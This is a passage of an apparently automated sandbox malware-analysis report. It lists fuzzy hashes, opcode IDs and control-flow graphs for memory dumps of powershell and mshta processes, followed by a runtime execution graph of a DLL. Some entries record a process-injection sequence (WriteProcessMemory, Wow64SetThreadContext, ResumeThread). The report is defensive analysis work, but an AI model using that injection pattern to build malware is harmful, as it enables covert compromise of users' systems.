                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89970000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                                • Opcode ID: 53ebed91df907742b2f61b48a56f88a7a491daecdadd353c73185fff474a29cb
                                                                                                                                                                                                • Instruction ID: bbe2c8e2c9ff941aac3c6a654ee08c240e3d7c79ecc94db5b1bd5eecb6b7af17
                                                                                                                                                                                                • Opcode Fuzzy Hash: 53ebed91df907742b2f61b48a56f88a7a491daecdadd353c73185fff474a29cb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9341E63190C7988FDB16DF689845BE97FE0EB56321F08429BD448C7167D764A809C792

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 457 7fe899768c0-7fe8997e360 460 7fe8997e36a-7fe8997e3af WriteProcessMemory 457->460 461 7fe8997e362-7fe8997e367 457->461 462 7fe8997e3b7-7fe8997e3e1 460->462 463 7fe8997e3b1 460->463 461->460 463->462
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.537987105.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89970000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                • Opcode ID: 29b41c5f350ad3aba40f330913d244e91010d1d5a80026af1b590c4d19b8c8d8
                                                                                                                                                                                                • Instruction ID: e87fd819f0aa6f19049b21facc2c6c0815bb8333f67a968b41e52700872d7295
                                                                                                                                                                                                • Opcode Fuzzy Hash: 29b41c5f350ad3aba40f330913d244e91010d1d5a80026af1b590c4d19b8c8d8
                                                                                                                                                                                                • Instruction Fuzzy Hash: B431D43190CB588FDB18DF5C98457F977E0FBA9711F00422FE089D3251CB70A8458B91

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 464 7fe89976880-7fe8997e055 467 7fe8997e057-7fe8997e05c 464->467 468 7fe8997e05f-7fe8997e091 Wow64SetThreadContext 464->468 467->468 469 7fe8997e099-7fe8997e0c0 468->469 470 7fe8997e093 468->470 470->469
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.537987105.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89970000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                                • Opcode ID: d45a6066515a38e186aa4073756b3eae3e218bf80e76c8fc9f457ebf984b1500
                                                                                                                                                                                                • Instruction ID: 19d0f51d8e1d385dd4f7ba21060254de9dd6d81954baecf268c896ba9518e656
                                                                                                                                                                                                • Opcode Fuzzy Hash: d45a6066515a38e186aa4073756b3eae3e218bf80e76c8fc9f457ebf984b1500
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C31F53190CB5C8FDB54DF9CD889BEA7BE1FB69320F04425BD449C3166DB30A8068B91

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 471 7fe8997e485-7fe8997e529 ResumeThread 474 7fe8997e52b 471->474 475 7fe8997e531-7fe8997e54d 471->475 474->475
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.537987105.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89970000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                • Opcode ID: bc28bfae86ed5ef8cd2e60114993dd29a5ba2f7cf5ad744a65a4b6b590c88f77
                                                                                                                                                                                                • Instruction ID: 3d822fe1d958e975bd183283c953bf628c99b961006722a5a3c885df136f04d0
                                                                                                                                                                                                • Opcode Fuzzy Hash: bc28bfae86ed5ef8cd2e60114993dd29a5ba2f7cf5ad744a65a4b6b590c88f77
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7821057190CA4C9FDB59DB68D84ABF97BE0FBA6320F00421FD08DC3662D7616856CB91

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 476 7fe899768f0-7fe8997e529 ResumeThread 479 7fe8997e52b 476->479 480 7fe8997e531-7fe8997e54d 476->480 479->480
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.537987105.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89970000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                • Opcode ID: 3641000bca145ed01ed026701c5d738bc62dd4f491d2c6da218182907b08599e
                                                                                                                                                                                                • Instruction ID: 52dd7532c424d662156d519bae87b8b714d319cd7f2acecd7867af2641eac017
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3641000bca145ed01ed026701c5d738bc62dd4f491d2c6da218182907b08599e
                                                                                                                                                                                                • Instruction Fuzzy Hash: CE21D37090CA4C9FDB58DB5CD849BB9BBE0FBA9321F10421ED04ED3661D7716416CB91
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.538212992.000007FE89A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 0Tt$0ct$8=t$Xh9
                                                                                                                                                                                                • API String ID: 0-2098600447
                                                                                                                                                                                                • Opcode ID: fec6288e80e6b1a81de7f681b5b146a7d6d0b2acbab9f2691cbed5859d650504
                                                                                                                                                                                                • Instruction ID: ad8b27ce1014e884e730b9ffea15183c20998026a42b989d16c55cf8c3d4fcba
                                                                                                                                                                                                • Opcode Fuzzy Hash: fec6288e80e6b1a81de7f681b5b146a7d6d0b2acbab9f2691cbed5859d650504
                                                                                                                                                                                                • Instruction Fuzzy Hash: DAE12620A1DBDA4FE757A73C58A42B57FE1EF97254B1800EBC08EC71A3D618AC59C351
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000F.00000003.487251152.0000000003870000.00000010.00000800.00020000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_15_3_3870000_mshta.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                • Instruction ID: 51ec2fc226732651857e7fd3860067c8cec1fa78247a6fc0243d0c145b97e5c5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000F.00000003.487251152.0000000003870000.00000010.00000800.00020000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_15_3_3870000_mshta.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                • Instruction ID: 51ec2fc226732651857e7fd3860067c8cec1fa78247a6fc0243d0c145b97e5c5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000F.00000003.487251152.0000000003870000.00000010.00000800.00020000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_15_3_3870000_mshta.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                • Instruction ID: 51ec2fc226732651857e7fd3860067c8cec1fa78247a6fc0243d0c145b97e5c5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                • Instruction Fuzzy Hash:

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:6.6%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                Signature Coverage:2.6%
                                                                                                                                                                                                Total number of Nodes:1688
                                                                                                                                                                                                Total number of Limit Nodes:24
                                                                                                                                                                                                execution_graph 7046 10008640 7049 10008657 7046->7049 7050 10008665 7049->7050 7051 10008679 7049->7051 7054 10006368 __dosmaperr 19 API calls 7050->7054 7052 10008681 7051->7052 7053 10008693 7051->7053 7055 10006368 __dosmaperr 19 API calls 7052->7055 7059 100054a7 __fassign 36 API calls 7053->7059 7061 10008652 7053->7061 7056 1000866a 7054->7056 7058 10008686 7055->7058 7057 100062ac _abort 25 API calls 7056->7057 7057->7061 7060 100062ac _abort 25 API calls 7058->7060 7059->7061 7060->7061 7617 10007a80 7618 10007a8d 7617->7618 7619 1000637b _abort 19 API calls 7618->7619 7620 10007aa7 7619->7620 7621 1000571e _free 19 API calls 7620->7621 7622 10007ab3 7621->7622 7623 1000637b _abort 19 API calls 7622->7623 7627 10007ad9 7622->7627 7624 10007acd 7623->7624 7626 1000571e _free 19 API calls 7624->7626 7625 10005eb7 10 API calls 7625->7627 7626->7627 7627->7625 7628 10007ae5 7627->7628 7629 10007b43 7627->7629 6957 10007103 GetCommandLineA GetCommandLineW 6958 10005303 6961 100050a5 6958->6961 6970 1000502f 6961->6970 6964 1000502f 5 API calls 6965 100050c3 6964->6965 6974 10005000 6965->6974 6968 10005000 19 API calls 6969 100050d9 6968->6969 6971 10005048 6970->6971 6972 10002ada _ValidateLocalCookies 5 API calls 6971->6972 6973 10005069 6972->6973 6973->6964 6975 1000502a 6974->6975 6976 1000500d 6974->6976 6975->6968 6977 10005024 6976->6977 6978 1000571e _free 19 API calls 6976->6978 6979 1000571e _free 19 API calls 6977->6979 6978->6976 6979->6975 7062 1000af43 7063 1000af59 7062->7063 7064 1000af4d 7062->7064 7064->7063 7065 1000af52 CloseHandle 7064->7065 7065->7063 7066 1000a945 7068 1000a96d 7066->7068 7067 1000a9a5 7068->7067 7069 1000a997 7068->7069 7070 1000a99e 7068->7070 7075 1000aa17 7069->7075 7079 1000aa00 7070->7079 7076 1000aa20 7075->7076 7083 1000b19b 7076->7083 7080 1000aa20 7079->7080 7081 1000b19b __startOneArgErrorHandling 20 API calls 7080->7081 7082 1000a9a3 7081->7082 7084 1000b1da __startOneArgErrorHandling 7083->7084 7088 1000b25c __startOneArgErrorHandling 7084->7088 7093 1000b59e 7084->7093 7086 1000b286 7089 1000b292 7086->7089 7100 1000b8b2 7086->7100 7088->7086 7096 100078a3 7088->7096 7091 10002ada _ValidateLocalCookies 5 API calls 7089->7091 7092 1000a99c 7091->7092 7107 1000b5c1 7093->7107 7097 100078cb 7096->7097 7098 10002ada _ValidateLocalCookies 5 API calls 7097->7098 7099 100078e8 7098->7099 7099->7086 7101 1000b8d4 7100->7101 7102 1000b8bf 7100->7102 7104 10006368 __dosmaperr 19 API calls 7101->7104 7103 1000b8d9 7102->7103 7105 10006368 __dosmaperr 19 API calls 7102->7105 7103->7089 7104->7103 7106 1000b8cc 7105->7106 7106->7089 7108 1000b5ec __raise_exc 7107->7108 7109 1000b7e5 RaiseException 7108->7109 7110 1000b5bc 7109->7110 7110->7088 7725 1000a1c6 IsProcessorFeaturePresent 7726 10007bc7 7727 10007bd3 ___scrt_is_nonwritable_in_current_image 7726->7727 7728 10007c0a _abort 7727->7728 7734 10005671 RtlEnterCriticalSection 7727->7734 7730 10007be7 7731 10007f86 __fassign 19 API calls 7730->7731 7732 10007bf7 7731->7732 7735 10007c10 7732->7735 7734->7730 7738 100056b9 RtlLeaveCriticalSection 7735->7738 7737 10007c17 7737->7728 7738->7737 7111 10005348 7112 10003529 ___vcrt_uninitialize 7 API calls 7111->7112 7113 1000534f 7112->7113 7114 10007b48 7124 10008ebf 7114->7124 7118 10007b55 7137 1000907c 7118->7137 7121 10007b7f 7122 1000571e _free 19 API calls 7121->7122 7123 10007b8a 7122->7123 7141 10008ec8 7124->7141 7126 10007b50 7127 10008fdc 7126->7127 7128 10008fe8 ___scrt_is_nonwritable_in_current_image 7127->7128 7161 10005671 RtlEnterCriticalSection 7128->7161 7130 1000905e 7175 10009073 7130->7175 7132 10008ff3 7132->7130 7134 10009032 RtlDeleteCriticalSection 7132->7134 7162 1000a09c 7132->7162 7133 1000906a _abort 7133->7118 7135 1000571e _free 19 API calls 7134->7135 7135->7132 7138 10009092 7137->7138 7139 10007b64 RtlDeleteCriticalSection 7137->7139 7138->7139 7140 1000571e _free 19 API calls 7138->7140 7139->7118 7139->7121 7140->7139 7142 10008ed4 ___scrt_is_nonwritable_in_current_image 7141->7142 7151 10005671 RtlEnterCriticalSection 7142->7151 7144 10008f77 7156 10008f97 7144->7156 7147 10008f83 _abort 7147->7126 7149 10008e78 63 API calls 7150 10008ee3 7149->7150 7150->7144 7150->7149 7152 10007b94 RtlEnterCriticalSection 7150->7152 7153 10008f6d 7150->7153 7151->7150 7152->7150 7159 10007ba8 RtlLeaveCriticalSection 7153->7159 7155 10008f75 7155->7150 7160 100056b9 RtlLeaveCriticalSection 7156->7160 7158 10008f9e 7158->7147 7159->7155 7160->7158 7161->7132 7163 1000a0a8 ___scrt_is_nonwritable_in_current_image 7162->7163 7164 1000a0b9 7163->7164 7165 1000a0ce 7163->7165 7166 10006368 __dosmaperr 19 API calls 7164->7166 7174 1000a0c9 _abort 7165->7174 7178 10007b94 RtlEnterCriticalSection 7165->7178 7167 1000a0be 7166->7167 7169 100062ac _abort 25 API calls 7167->7169 7169->7174 7170 1000a0ea 7179 1000a026 7170->7179 7172 1000a0f5 7195 1000a112 7172->7195 7174->7132 7443 100056b9 RtlLeaveCriticalSection 7175->7443 7177 1000907a 7177->7133 7178->7170 7180 1000a033 7179->7180 7182 1000a048 7179->7182 7181 10006368 __dosmaperr 19 API calls 7180->7181 7183 1000a038 7181->7183 7187 1000a043 7182->7187 7198 10008e12 7182->7198 7185 100062ac _abort 25 API calls 7183->7185 7185->7187 7187->7172 7188 1000907c 19 API calls 7189 1000a064 7188->7189 7204 10007a5a 7189->7204 7191 1000a06a 7211 1000adce 7191->7211 7194 1000571e _free 19 API calls 7194->7187 7442 10007ba8 RtlLeaveCriticalSection 7195->7442 7197 1000a11a 7197->7174 7199 10008e26 7198->7199 7200 10008e2a 7198->7200 7199->7188 7200->7199 7201 10007a5a 25 API calls 7200->7201 7202 10008e4a 7201->7202 7226 10009a22 7202->7226 7205 10007a66 7204->7205 7206 10007a7b 7204->7206 7207 10006368 __dosmaperr 19 API calls 7205->7207 7206->7191 7208 10007a6b 7207->7208 7209 100062ac _abort 25 API calls 7208->7209 7210 10007a76 7209->7210 7210->7191 7212 1000addd 7211->7212 7213 1000adf2 7211->7213 7215 10006355 __dosmaperr 19 API calls 7212->7215 7214 1000ae2d 7213->7214 7218 1000ae19 7213->7218 7216 10006355 __dosmaperr 19 API calls 7214->7216 7217 1000ade2 7215->7217 7219 1000ae32 7216->7219 7220 10006368 __dosmaperr 19 API calls 7217->7220 7399 1000ada6 7218->7399 7222 10006368 __dosmaperr 19 API calls 7219->7222 7223 1000a070 7220->7223 7224 1000ae3a 7222->7224 7223->7187 7223->7194 7225 100062ac _abort 25 API calls 7224->7225 7225->7223 7227 10009a2e ___scrt_is_nonwritable_in_current_image 7226->7227 7228 10009a36 7227->7228 7229 10009a4e 7227->7229 7251 10006355 7228->7251 7231 10009aec 7229->7231 7235 10009a83 7229->7235 7233 10006355 __dosmaperr 19 API calls 7231->7233 7236 10009af1 7233->7236 7234 10006368 __dosmaperr 19 API calls 7247 10009a43 _abort 7234->7247 7254 10008c7b RtlEnterCriticalSection 7235->7254 7238 10006368 __dosmaperr 19 API calls 7236->7238 7240 10009af9 7238->7240 7239 10009a89 7241 10009aa5 7239->7241 7242 10009aba 7239->7242 7243 100062ac _abort 25 API calls 7240->7243 7245 10006368 __dosmaperr 19 API calls 7241->7245 7255 10009b0d 7242->7255 7243->7247 7246 10009aaa 7245->7246 7249 10006355 __dosmaperr 19 API calls 7246->7249 7247->7199 7248 10009ab5 7306 10009ae4 7248->7306 7249->7248 7252 10005b7a _abort 19 API calls 7251->7252 7253 1000635a 7252->7253 7253->7234 7254->7239 7256 10009b3b 7255->7256 7294 10009b34 7255->7294 7257 10009b5e 7256->7257 7258 10009b3f 7256->7258 7261 10009baf 7257->7261 7262 10009b92 7257->7262 7260 10006355 __dosmaperr 19 API calls 7258->7260 7259 10002ada _ValidateLocalCookies 5 API calls 7263 10009d15 7259->7263 7264 10009b44 7260->7264 7266 10009bc5 7261->7266 7309 1000a00b 7261->7309 7265 10006355 __dosmaperr 19 API calls 7262->7265 7263->7248 7267 10006368 __dosmaperr 19 API calls 7264->7267 7271 10009b97 7265->7271 7312 100096b2 7266->7312 7269 10009b4b 7267->7269 7272 100062ac _abort 25 API calls 7269->7272 7274 10006368 __dosmaperr 19 API calls 7271->7274 7272->7294 7277 10009b9f 7274->7277 7275 10009bd3 7278 10009bd7 7275->7278 7279 10009bf9 7275->7279 7276 10009c0c 7281 10009c20 7276->7281 7282 10009c66 WriteFile 7276->7282 7280 100062ac _abort 25 API calls 7277->7280 7285 10009ccd 7278->7285 7319 10009645 7278->7319 7324 10009492 GetConsoleCP 7279->7324 7280->7294 7283 10009c56 7281->7283 7284 10009c28 7281->7284 7287 10009c89 GetLastError 7282->7287 7292 10009bef 7282->7292 7350 10009728 7283->7350 7288 10009c46 7284->7288 7289 10009c2d 7284->7289 7285->7294 7295 10006368 __dosmaperr 19 API calls 7285->7295 7287->7292 7342 100098f5 7288->7342 7289->7285 7335 10009807 7289->7335 7292->7285 7292->7294 7296 10009ca9 7292->7296 7294->7259 7298 10009cf2 7295->7298 7300 10009cb0 7296->7300 7301 10009cc4 7296->7301 7299 10006355 __dosmaperr 19 API calls 7298->7299 7299->7294 7302 10006368 __dosmaperr 19 API calls 7300->7302 7357 10006332 7301->7357 7304 10009cb5 7302->7304 7305 10006355 __dosmaperr 19 API calls 7304->7305 7305->7294 7398 10008c9e RtlLeaveCriticalSection 7306->7398 7308 10009aea 7308->7247 7362 10009f8d 7309->7362 7384 10008dbc 7312->7384 7314 100096c2 7315 10005af6 _abort 36 API calls 7314->7315 7316 100096c7 7314->7316 7317 100096ea 7315->7317 7316->7275 7316->7276 7317->7316 7318 10009708 GetConsoleMode 7317->7318 7318->7316 7320 1000966a 7319->7320 7322 1000969f 7319->7322 7321 100096a1 GetLastError 7320->7321 7320->7322 7323 1000a181 WriteConsoleW 7320->7323 7321->7322 7322->7292 7323->7320 7332 100094f5 7324->7332 7334 10009607 7324->7334 7325 10002ada _ValidateLocalCookies 5 API calls 7326 10009641 7325->7326 7326->7292 7328 100079e6 38 API calls __fassign 7328->7332 7329 1000957b WideCharToMultiByte 7330 100095a1 WriteFile 7329->7330 7329->7334 7331 1000962a GetLastError 7330->7331 7330->7332 7331->7334 7332->7328 7332->7329 7333 100095d2 WriteFile 7332->7333 7332->7334 7393 10007c19 7332->7393 7333->7331 7333->7332 7334->7325 7336 10009816 7335->7336 7337 100098d8 7336->7337 7338 10009894 WriteFile 7336->7338 7339 10002ada _ValidateLocalCookies 5 API calls 7337->7339 7338->7336 7341 100098da GetLastError 7338->7341 7340 100098f1 7339->7340 7340->7292 7341->7337 7347 10009904 7342->7347 7343 10009a0f 7344 10002ada _ValidateLocalCookies 5 API calls 7343->7344 7346 10009a1e 7344->7346 7345 10009986 WideCharToMultiByte 7348 10009a07 GetLastError 7345->7348 7349 100099bb WriteFile 7345->7349 7346->7292 7347->7343 7347->7345 7347->7349 7348->7343 7349->7347 7349->7348 7351 10009737 7350->7351 7352 100097ea 7351->7352 7354 100097a9 WriteFile 7351->7354 7353 10002ada _ValidateLocalCookies 5 API calls 7352->7353 7356 10009803 7353->7356 7354->7351 7355 100097ec GetLastError 7354->7355 7355->7352 7356->7292 7358 10006355 __dosmaperr 19 API calls 7357->7358 7359 1000633d __dosmaperr 7358->7359 7360 10006368 __dosmaperr 19 API calls 7359->7360 7361 10006350 7360->7361 7361->7294 7371 10008d52 7362->7371 7364 10009f9f 7365 10009fa7 7364->7365 7366 10009fb8 SetFilePointerEx 7364->7366 7367 10006368 __dosmaperr 19 API calls 7365->7367 7368 10009fd0 GetLastError 7366->7368 7369 10009fac 7366->7369 7367->7369 7370 10006332 __dosmaperr 19 API calls 7368->7370 7369->7266 7370->7369 7372 10008d5f 7371->7372 7373 10008d74 7371->7373 7374 10006355 __dosmaperr 19 API calls 7372->7374 7376 10006355 __dosmaperr 19 API calls 7373->7376 7378 10008d99 7373->7378 7375 10008d64 7374->7375 7377 10006368 __dosmaperr 19 API calls 7375->7377 7379 10008da4 7376->7379 7380 10008d6c 7377->7380 7378->7364 7381 10006368 __dosmaperr 19 API calls 7379->7381 7380->7364 7382 10008dac 7381->7382 7383 100062ac _abort 25 API calls 7382->7383 7383->7380 7385 10008dc9 7384->7385 7387 10008dd6 7384->7387 7386 10006368 __dosmaperr 19 API calls 7385->7386 7390 10008dce 7386->7390 7388 10008de2 7387->7388 7389 10006368 __dosmaperr 19 API calls 7387->7389 7388->7314 7391 10008e03 7389->7391 7390->7314 7392 100062ac _abort 25 API calls 7391->7392 7392->7390 7394 10005af6 _abort 36 API calls 7393->7394 7395 10007c24 7394->7395 7396 10007a00 __fassign 36 API calls 7395->7396 7397 10007c34 7396->7397 7397->7332 7398->7308 7402 1000ad24 7399->7402 7401 1000adca 7401->7223 7403 1000ad30 ___scrt_is_nonwritable_in_current_image 7402->7403 7413 10008c7b RtlEnterCriticalSection 7403->7413 7405 1000ad3e 7406 1000ad70 7405->7406 7407 1000ad65 7405->7407 7408 10006368 __dosmaperr 19 API calls 7406->7408 7414 1000ae4d 7407->7414 7410 1000ad6b 7408->7410 7429 1000ad9a 7410->7429 7412 1000ad8d _abort 7412->7401 7413->7405 7415 10008d52 25 API calls 7414->7415 7418 1000ae5d 7415->7418 7416 1000ae63 7432 10008cc1 7416->7432 7418->7416 7419 1000ae95 7418->7419 7422 10008d52 25 API calls 7418->7422 7419->7416 7420 10008d52 25 API calls 7419->7420 7423 1000aea1 CloseHandle 7420->7423 7425 1000ae8c 7422->7425 7423->7416 7426 1000aead GetLastError 7423->7426 7424 1000aedd 7424->7410 7428 10008d52 25 API calls 7425->7428 7426->7416 7427 10006332 __dosmaperr 19 API calls 7427->7424 7428->7419 7441 10008c9e RtlLeaveCriticalSection 7429->7441 7431 1000ada4 7431->7412 7433 10008cd0 7432->7433 7434 10008d37 7432->7434 7433->7434 7438 10008cfa 7433->7438 7435 10006368 __dosmaperr 19 API calls 7434->7435 7436 10008d3c 7435->7436 7437 10006355 __dosmaperr 19 API calls 7436->7437 7439 10008d27 7437->7439 7438->7439 7440 10008d21 SetStdHandle 7438->7440 7439->7424 7439->7427 7440->7439 7441->7431 7442->7197 7443->7177 7444 10002049 7445 10002055 ___scrt_is_nonwritable_in_current_image 7444->7445 7446 100020d3 7445->7446 7447 1000207d 7445->7447 7457 1000205e 7445->7457 7449 10002639 ___scrt_fastfail 4 API calls 7446->7449 7458 1000244c 7447->7458 7451 100020da 7449->7451 7450 10002082 7467 10002308 7450->7467 7453 10002087 __RTC_Initialize 7470 100020c4 7453->7470 7455 1000209f 7473 1000260b 7455->7473 7459 10002451 ___scrt_release_startup_lock 7458->7459 7460 10002455 7459->7460 7462 10002461 7459->7462 7461 1000527a _abort 19 API calls 7460->7461 7463 1000245f 7461->7463 7464 1000246e 7462->7464 7465 1000499b _abort 26 API calls 7462->7465 7463->7450 7464->7450 7466 10004bbd 7465->7466 7466->7450 7479 100034c7 RtlInterlockedFlushSList 7467->7479 7469 10002312 7469->7453 7481 1000246f 7470->7481 7472 100020c9 ___scrt_release_startup_lock 7472->7455 7474 10002617 7473->7474 7475 1000262d 7474->7475 7489 100053ed 7474->7489 7475->7457 7478 10003529 ___vcrt_uninitialize 7 API calls 7478->7475 7480 100034d7 7479->7480 7480->7469 7486 100053ff 7481->7486 7484 1000391b ___vcrt_uninitialize_ptd 5 API calls 7485 1000354d 7484->7485 7485->7472 7487 10005c2b 10 API calls 7486->7487 7488 10002476 7487->7488 7488->7484 7492 100074da 7489->7492 7495 100074f3 7492->7495 7493 10002ada _ValidateLocalCookies 5 API calls 7494 10002625 7493->7494 7494->7478 7495->7493 7630 10008a89 7633 10006d60 7630->7633 7634 10006d69 7633->7634 7635 10006d72 7633->7635 7636 10006c5f 49 API calls 7634->7636 7636->7635 6804 1000220c 6805 10002215 6804->6805 6806 1000221a dllmain_dispatch 6804->6806 6808 100022b1 6805->6808 6809 100022c7 6808->6809 6811 100022d0 6809->6811 6812 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6809->6812 6811->6806 6812->6811 7496 1000724e GetProcessHeap 7497 1000284f 7498 10002882 std::exception::exception 26 API calls 7497->7498 7499 1000285d 7498->7499 7641 10003c90 RtlUnwind 7739 100036d0 7740 100036e2 7739->7740 7742 100036f0 @_EH4_CallFilterFunc@8 7739->7742 7741 10002ada _ValidateLocalCookies 5 API calls 7740->7741 7741->7742 7500 10005351 7501 10005360 7500->7501 7502 10005374 7500->7502 7501->7502 7504 1000571e _free 19 API calls 7501->7504 7503 1000571e _free 19 API calls 7502->7503 7505 10005386 7503->7505 7504->7502 7506 1000571e _free 19 API calls 7505->7506 7507 10005399 7506->7507 7508 1000571e _free 19 API calls 7507->7508 7509 100053aa 7508->7509 7510 1000571e _free 19 API calls 7509->7510 7511 100053bb 7510->7511 7743 100073d5 7744 100073e1 ___scrt_is_nonwritable_in_current_image 7743->7744 7755 10005671 RtlEnterCriticalSection 7744->7755 7746 100073e8 7747 10008be3 26 API calls 7746->7747 7748 100073f7 7747->7748 7749 10007406 7748->7749 7756 10007269 GetStartupInfoW 7748->7756 7767 10007422 7749->7767 7754 10007417 _abort 7755->7746 7757 10007286 7756->7757 7758 10007318 7756->7758 7757->7758 7759 10008be3 26 API calls 7757->7759 7762 1000731f 7758->7762 7761 100072af 7759->7761 7760 100072dd GetFileType 7760->7761 7761->7758 7761->7760 7764 10007326 7762->7764 7763 10007369 GetStdHandle 7763->7764 7764->7763 7765 100073d1 7764->7765 7766 1000737c GetFileType 7764->7766 7765->7749 7766->7764 7770 100056b9 RtlLeaveCriticalSection 7767->7770 7769 10007429 7769->7754 7770->7769 7771 10004ed7 7772 10006d60 49 API calls 7771->7772 7773 10004ee9 7772->7773 7782 10007153 GetEnvironmentStringsW 7773->7782 7777 1000571e _free 19 API calls 7778 10004f29 7777->7778 7779 10004eff 7780 1000571e _free 19 API calls 7779->7780 7781 10004ef4 7780->7781 7781->7777 7783 100071bd 7782->7783 7784 1000716a 7782->7784 7786 100071c6 FreeEnvironmentStringsW 7783->7786 7787 10004eee 7783->7787 7785 10007170 WideCharToMultiByte 7784->7785 7785->7783 7788 1000718c 7785->7788 7786->7787 7787->7781 7794 10004f2f 7787->7794 7789 100056d0 20 API calls 7788->7789 7790 10007192 7789->7790 7791 100071af 7790->7791 7792 10007199 WideCharToMultiByte 7790->7792 7793 1000571e _free 19 API calls 7791->7793 7792->7791 7793->7783 7795 10004f44 7794->7795 7796 1000637b _abort 19 API calls 7795->7796 7805 10004f6b 7796->7805 7797 